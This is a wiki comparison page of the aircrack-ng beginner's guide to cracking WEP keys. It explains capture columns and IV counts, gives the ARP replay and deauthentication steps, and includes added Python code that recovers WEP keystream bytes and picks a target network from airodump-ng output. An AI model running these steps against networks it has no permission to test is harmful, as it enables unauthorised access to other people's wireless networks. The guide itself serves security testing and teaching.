newbie_guide

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
Next revisionBoth sides next revision
newbie_guide: comparison of revision 2009/08/14 18:35 (use dokuwiki internal links, mister_x) with revision 2010/11/21 00:05 (typos, sleek)

You need a wireless card that is compatible with the aircrack-ng suite: hardware that is fully supported by the drivers and can inject packets. With such a card a WEP-protected access point can be cracked in under an hour.
  
To determine which category your card belongs to, see [[compatibility_drivers|hardware compatibility page]]. Read [[compatible_cards|Tutorial: Is My Wireless Card Compatible?]] if you don't know where to look in this table. It still does not hurt to read this tutorial to build your knowledge and confirm your card attributes.
  
First, you need to know which chipset is used in your wireless card and which driver you need for it. You will have determined this using the information in the previous paragraph. The [[compatibility_drivers#drivers|drivers section]] will tell you which drivers you need for your specific chipset. Download them and then get the corresponding patch from http://patches.aircrack-ng.org. (These patches enable support for injection.)

^ PWR          | Signal strength. Some drivers don't report it  |
^ Beacons      | Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality |
^ Data         | Number of data frames received   |
^ CH           | Channel the AP is operating on   |
^ MB           | Speed or AP mode. 11 is pure 802.11b, 54 pure 802.11g. Values in between are a mixture  |

^ STATION      | The MAC of the client itself  |
^ PWR          | Signal strength. Some drivers don't report it  |
^ Packets      | Number of data frames received   |
^ Probes       | Network names (ESSIDs) this client has probed  |
  
For more information about [[aircrack-ng]] parameters, description of the output and usage see the [[aircrack-ng|manual]].
  
The number of IVs you need to crack a key is not fixed. This is because some IVs are weaker and leak more information about the key than others. Usually these weak IVs are randomly mixed in between the stronger ones. So if you are lucky, you can crack a key with only 20 000 IVs. But often this is not enough and aircrack-ng will run a long time (up to a week or even longer with a high fudge factor) and then tell you the key could not be cracked. If you have more IVs cracking can be done a lot faster and is usually done in a few minutes, or even seconds. Experience shows that 40 000 to 85 000 IVs is usually enough for cracking with the older statistical attacks; the PTW method described in the ARP replay section needs far fewer packets.
  
There are some more advanced APs out there that use an algorithm to filter out weak IVs. The result is either that you can't get more than "n" different IVs from the AP or that you'll need millions (like 5 to 7 million) to crack the key. Search the [[http://forum.aircrack-ng.org/|Forum]]; there are threads about cases like this and what to do.

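To make the IV argument concrete, here is an added Python example, not code from the aircrack-ng project or from this wiki: a toy model of WEP's per-frame keying. It shows that the RC4 key for each frame is the 3-byte IV (sent in the clear) followed by the secret key, that any frame whose first plaintext bytes are known (an ARP request starts with a fixed LLC/SNAP header, which is why ARP replay feeds aircrack-ng so well) hands the attacker the first keystream bytes for that IV, and that only distinct IVs count. The secret key, the IV and the payloads are constructed values, and the CRC-32 ICV that real WEP appends before encryption is left out.

```python
"""Added example, not from the aircrack-ng project or this wiki: a toy model
of WEP's per-frame RC4 keying, to show why captured IVs matter and why
frames with known plaintext (ARP requests) are the ones worth provoking.

Assumptions of this example: the secret key, IV and payloads are
constructed values, the CRC-32 ICV that real WEP appends before encryption
is omitted, and a "frame" is just an (iv, ciphertext) pair.
"""
from typing import Iterator, List, Tuple


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Standard RC4: key scheduling, then the output generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP seeds RC4 with IV || secret key. The 3-byte IV travels in the
    clear, so the attacker knows the first 3 bytes of every per-frame key;
    the FMS and PTW attacks work out the remaining bytes statistically from
    many such frames, and a "weak" IV is one whose first keystream byte
    depends strongly on a byte of the secret key."""
    ks = rc4_keystream(iv + secret)
    return bytes(p ^ next(ks) for p in plaintext)


# An 802.11 data frame body starts with an LLC/SNAP header; for ARP it is
# AA AA 03 00 00 00 08 06, so the first 8 plaintext bytes are known.
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def recover_keystream(ciphertext: bytes, known: bytes = SNAP_ARP) -> bytes:
    """known plaintext XOR ciphertext = keystream bytes for that IV, with no
    key needed. This is the "keystream" the guide says you can sniff, and
    the per-IV material that the PTW attack in aircrack-ng is built on."""
    return bytes(c ^ p for c, p in zip(ciphertext, known))


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so c1 XOR c2 equals
    p1 XOR p2: an IV reused by the AP leaks plaintext relations directly."""
    return bytes(a ^ b for a, b in zip(c1, c2))


def distinct_ivs(frames: List[Tuple[bytes, bytes]]) -> int:
    """What counts toward cracking is the number of *distinct* IVs, which is
    why the attack replays a packet to make the AP emit fresh ones rather
    than collecting the same few frames over and over."""
    return len({iv for iv, _ in frames})


if __name__ == "__main__":
    secret = bytes.fromhex("0123456789")          # constructed 40-bit key
    iv = bytes.fromhex("075b1a")                  # constructed IV
    arp = SNAP_ARP + bytes(range(28))             # constructed ARP payload
    c = wep_encrypt(secret, iv, arp)
    print("IV", iv.hex(), "keystream[0:8] =", recover_keystream(c).hex())
```

The attacker never needs the secret key to run `recover_keystream`; collecting one such 8-byte keystream prefix per distinct IV, together with the known IV bytes of each per-frame key, is exactly the input the statistical attacks consume, which is why "how many IVs" is the question that matters.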
Wait for a client to show up on the target network. Then start the attack:
  
  aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
  
-b specifies the target BSSID, -h the MAC of the connected client.

Now you have to wait for an ARP packet to arrive. Usually you'll have to wait for a few minutes (or look at the next chapter).
  
If you were successful, you'll see something like this:
  
  Saving ARP requests in replay_arp-0627-121526.cap

When using the ARP injection technique, you can use the PTW method to crack the WEP key. This dramatically reduces the number of data packets you need and also the time needed. You must capture the full packet in airodump-ng, meaning do not use the "%%--ivs%%" option when starting it. For [[aircrack-ng]], use "aircrack-ng -z <file name>". (PTW is the default attack in 1.0-rc1 and later.)
  
If the number of data packets received by airodump-ng sometimes stops increasing you may have to reduce the replay rate. You do this with the -x <packets per second> option. I usually start out with 50 and reduce until packets are received continuously again. Better positioning of your antenna usually also helps.
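The following is an added Python example, not code from the aircrack-ng project or this wiki, that ties the column descriptions earlier in the guide to the ARP replay command: it parses the CSV summary that airodump-ng writes next to the capture when started with -w <prefix>, keeps only WEP networks that have an associated client, picks the one with the highest data count, and builds the corresponding aireplay-ng --arpreplay command line. The header layout is assumed to be the one airodump-ng writes (check the first line of your own <prefix>-01.csv if it differs), the "# IV" column is taken to be the #Data counter shown on the live screen, and the CSV text embedded in the script is constructed, not a real capture.

```python
"""Added example, not from the aircrack-ng project or this wiki: choose an
ARP-replay target from the CSV that airodump-ng writes beside the capture
file when run with -w <prefix>.

Assumptions of this example: the header layout is airodump-ng's CSV header
(verify against the first line of your own <prefix>-01.csv), and the
"# IV" column is the same counter as #Data on the live screen. SAMPLE_CSV
is constructed data, not a real capture.
"""
import csv
import io
from dataclasses import dataclass, field
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed sample in airodump-ng's CSV layout: an AP section, a blank
# line, then a station section. The MACs reuse the ones from the guide.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:01:02:03:04:05, 2010-11-21 00:01:02, 2010-11-21 00:05:10,  6,  54, WEP , WEP, OPN, -45,      120,     3100,   0.  0.  0.  0,   5, lab01,
00:11:22:33:44:55, 2010-11-21 00:01:03, 2010-11-21 00:05:10, 11,  54, WPA2, CCMP, PSK, -70,       98,       12,   0.  0.  0.  0,   6, office,
00:AA:BB:CC:DD:EE, 2010-11-21 00:01:07, 2010-11-21 00:05:09,  1,  11, WEP , WEP,    , -80,       40,       17,   0.  0.  0.  0,   4, attic,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:04:05:06:07:08, 2010-11-21 00:02:00, 2010-11-21 00:05:10, -50,      410, 00:01:02:03:04:05, lab01
00:DE:AD:BE:EF:01, 2010-11-21 00:02:30, 2010-11-21 00:05:08, -60,       33, (not associated) , office,lab01
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str
    data: int                      # "# IV" column: #Data on the live screen
    essid: str
    clients: List[str] = field(default_factory=list)


def _rows(section: str) -> Iterator[Tuple[Dict[str, int], List[str]]]:
    """Yield (column-name -> index, stripped row) for one CSV section."""
    reader = csv.reader(io.StringIO(section), skipinitialspace=True)
    header = next(reader, None)
    if header is None:
        return
    idx = {name.strip(): i for i, name in enumerate(header)}
    for row in reader:
        if row and row[0].strip():
            yield idx, [f.strip() for f in row]


def parse_airodump_csv(text: str) -> Dict[str, AccessPoint]:
    """Return the APs keyed by BSSID, each with its associated client MACs."""
    ap_section, _, sta_section = text.replace("\r\n", "\n").partition("\n\n")
    aps: Dict[str, AccessPoint] = {}
    for idx, row in _rows(ap_section):
        ap = AccessPoint(
            bssid=row[idx["BSSID"]],
            channel=int(row[idx["channel"]]),
            privacy=row[idx["Privacy"]],
            data=int(row[idx["# IV"]]),
            essid=row[idx["ESSID"]],
        )
        aps[ap.bssid] = ap
    for idx, row in _rows(sta_section):
        bssid = row[idx["BSSID"]]
        if bssid in aps:                      # "(not associated)" is skipped
            aps[bssid].clients.append(row[idx["Station MAC"]])
    return aps


def pick_arp_replay_target(aps: Dict[str, AccessPoint]) -> Optional[AccessPoint]:
    """Preconditions for the attack: WEP, and a client to take the -h MAC
    from. Among those, prefer the AP already moving the most data frames."""
    candidates = [ap for ap in aps.values() if ap.privacy == "WEP" and ap.clients]
    return max(candidates, key=lambda ap: ap.data) if candidates else None


def arp_replay_command(ap: AccessPoint, iface: str) -> str:
    """Build the aireplay-ng invocation from the guide for this target."""
    return f"aireplay-ng --arpreplay -b {ap.bssid} -h {ap.clients[0]} {iface}"


if __name__ == "__main__":
    aps = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps.values():
        print(f"{ap.bssid} ch{ap.channel:<2} {ap.privacy:<4} data={ap.data:<6} "
              f"clients={len(ap.clients)} {ap.essid}")
    target = pick_arp_replay_target(aps)
    if target is None:
        print("no WEP network with an associated client yet; keep airodump-ng running")
    else:
        print("lock airodump-ng to channel", target.channel, "and run:")
        print(arp_replay_command(target, "rausb0"))
```

Re-running the parser on the same file a minute later and comparing the `data` field of the target is a quick way to see whether the #Data counter is still growing; if it has stalled, that is the moment to lower the -x replay rate or move the antenna.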
  
==== The aggressive way ====
  
Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect, to capture an ARP request. A side effect is that you can sniff the ESSID and possibly a keystream during reconnection too. This comes in handy if the ESSID of your target is hidden, or if it uses shared-key authentication.
  
Keep your airodump-ng and aireplay-ng running. Open another window and run a [[deauthentication]] attack:
  
====== Further tools and information ======
[[http://www.tuto-fr.com/tutoriaux/crack-wep/aircrack-ng.php|Tutorial in French for aircrack-ng]] [[http://www.tuto-fr.com/en/tutorial/tutorial-crack-wep-aircrack.php|or in English]]
newbie_guide.txt · Last modified: 2018/11/21 23:31 by mister_x